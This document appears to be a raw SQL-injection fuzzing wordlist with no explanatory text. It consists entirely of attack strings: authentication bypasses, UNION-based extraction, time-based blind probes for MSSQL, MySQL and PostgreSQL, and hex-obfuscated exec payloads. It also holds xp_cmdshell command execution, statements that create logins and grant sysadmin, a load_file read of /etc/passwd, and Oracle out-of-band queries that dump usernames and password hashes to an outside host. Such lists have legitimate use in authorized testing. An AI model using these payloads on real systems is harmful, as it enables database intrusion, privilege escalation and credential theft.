'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 'create user name identified by 'pass123' -- 'create user name identified by pass123 temporary tablespace temp default tablespace users; ' ; drop table temp -- 'exec sp_addlogin 'name' , 'password' -- ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- ' grant connect to name; grant resource to name; -- ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- <>"'%;)(&+ | ! ? / // //* ' ' -- ( ) *| */* & 0 031003000270000 0 or 1=1 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 1 or 1=1 1;SELECT%20* 1 waitfor delay '0:0:10'-- '%20or%20''=' '%20or%201=1 ')%20or%20('x'='x '%20or%20'x'='x %20or%20x=x %20'sleep%2050' %20$(sleep%2050) %21 23 OR 1=1 %26 %27%20or%201=1 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C ||6 '||'6 (||6) %7C a' admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- anything' OR 'x'='x "a"" or 1=1--" a' or 1=1-- "a"" or 3=3--" a' or 3=3-- a' or 'a' = 'a '%20OR as asc a' waitfor delay '0:0:10'-- '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > bfilename char%4039%41%2b%40SELECT declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @q nvarchar (4000) select @q = declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @s varchar(22) select @s = declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e delete desc distinct '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '; exec master..xp_cmdshell '; exec master..xp_cmdshell 'ping 172.10.1.255'-- exec(@s) '; exec ('sel' + 'ect us' + 'er') exec sp '; execute immediate 'sel' || 'ect us' || 'er' exec xp '; exec xp_regread ' group by userid having 1=1-- handler having ' having 1=1-- hi or 1=1 --" hi' or 1=1 -- "hi"") or (""a""=""a" hi or a=a hi' or 'a'='a hi') or ('a'='a 'hi' or 'x'='x'; insert like limit *(|(mail=*)) *(|(objectclass=*)) or ' or ''=' or 0=0 #" ' or 0=0 -- ' or 0=0 # " or 0=0 -- or 0=0 -- or 0=0 # ' or 1 --' ' or 1/* ; or '1'='1' ' or '1'='1 ' or '1'='1'-- ' or 1=1 ' or 1=1 /* ' or 1=1-- ' or 1=1-- '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- " or 1=1-- or 1=1 or 1=1-- or 1=1 or ""= ' or 1=1 or ''=' ' or 1 in (select @@version)-- or%201=1 or%201=1 -- ' or 2 > 1 ' or 2 between 1 and 3 ' or 3=3 ‘ or 3=3 -- ' or '7659'='7659 or a=a or a = a ' or 'a'='a ' or a=a-- ') or ('a'='a " or "a"="a ) or (a=a order by ' or (EXISTS) or isNULL(1/0) /* " or isNULL(1/0) /* ' or 'something' like 'some%' ' or 'something' = 'some'+'thing' ' or 'text' = n'text' ' or 'text' > 't' ' or uid like '% ' or uname like '% ' or 'unusual' = 'unusual' ' or userid like '% ' or user like '% ' or username like '% ' or username like char(37); ' or 'whatever' in ('whatever') ' -- &password= password:*/=1-- PRINT PRINT @@variable procedure replace select ' select * from information_schema.tables-- ' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- ' (select top 1 --sp_password 'sqlattempt1 (sqlattempt2) 'sqlvuln '+sqlvuln (sqlvuln) sqlvuln; t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset ' UNION ALL SELECT ' union all select @@version-- ' union select uni/**/on sel/**/ect ' UNION SELECT ' union select 1,load_file('/etc/passwd'),1,1,1; ) union select * from information_schema.tables; ' union select * from users where login = char(114,111,111,116); update '||UTL_HTTP.REQUEST ,@variable @variable @var select @var as var into temp end -- \x27UNION SELECT x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND email IS NULL; -- x' AND members.email IS NULL; -- x' AND userid IS NULL; -- x' or 1=1 or 'x'='y x' OR full_name LIKE '%Bob% ý or 1=1 -- sleep(__TIME__)# 1 or sleep(__TIME__)# " or sleep(__TIME__)# ' or sleep(__TIME__)# " or sleep(__TIME__)=" ' or sleep(__TIME__)=' 1) or sleep(__TIME__)# ") or sleep(__TIME__)=" ') or sleep(__TIME__)=' 1)) or sleep(__TIME__)# ")) or sleep(__TIME__)=" ')) or sleep(__TIME__)=' ;waitfor delay '0:0:__TIME__'-- );waitfor delay '0:0:__TIME__'-- ';waitfor delay '0:0:__TIME__'-- ";waitfor delay '0:0:__TIME__'-- ');waitfor delay '0:0:__TIME__'-- ");waitfor delay '0:0:__TIME__'-- ));waitfor delay '0:0:__TIME__'-- '));waitfor delay '0:0:__TIME__'-- "));waitfor delay '0:0:__TIME__'-- benchmark(10000000,MD5(1))# 1 or benchmark(10000000,MD5(1))# " or benchmark(10000000,MD5(1))# ' or benchmark(10000000,MD5(1))# 1) or benchmark(10000000,MD5(1))# ") or benchmark(10000000,MD5(1))# ') or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))# pg_sleep(__TIME__)-- 1 or pg_sleep(__TIME__)-- " or pg_sleep(__TIME__)-- ' or pg_sleep(__TIME__)-- 1) or pg_sleep(__TIME__)-- ") or pg_sleep(__TIME__)-- ') or pg_sleep(__TIME__)-- 1)) or pg_sleep(__TIME__)-- ")) or pg_sleep(__TIME__)-- ')) or pg_sleep(__TIME__)-- 1'1 1 exec sp_ (or exec xp_) 1 and 1=1 1' and 1=(select count(*) from tablenames); -- 1 or 1=1 1' or '1'='1 1 1 and user_name() = 'dbo' \'; desc users; -- 1\'1 1' and non_existant_table = '1 ' or username is not NULL or username = ' 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 1 uni/**/on select all from where ’ or ‘1’=’1 ' or '1'='1 '||utl_http.request('httP://192.168.1.1/')||' ' || myappadmin.adduser('admin', 'newpass') || ' ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i